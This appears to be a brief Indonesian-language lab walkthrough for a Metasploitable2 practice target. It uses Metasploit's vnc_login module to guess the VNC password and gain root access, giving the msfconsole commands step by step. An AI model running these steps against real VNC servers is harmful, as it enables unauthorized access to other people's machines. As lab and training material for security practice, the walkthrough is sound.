- Buka msfconsole di terminal
msfconsole
- Dari hasil scanning nmap diketahui bahwa server menggunakan VNC versi
3.3
. Jadi cari modul untuk exploit VNC versi3.3
search vnc 3.3
- Gunakan modul
auxiliary/scanner/vnc/vnc_login
yang berada di nomor urut 1 dari hasil pencarian
use <nomor_modul>
- Tampilkan daftar parameter yang dibutuhkan di modul tersebut
show options
- Isi parameter yang dibutuhkan di modul tersebut
set rhosts <IP_metasploitable2>
set stop_on_success true
- Setelah pengisian parameter selesai jalankan modul tersebut. Disini didapat
password
sebagai password untuk masuk ke VNC server
run
- Akses VNC server melalui terminal baru dan disini kita berhasil masuk sebagai user root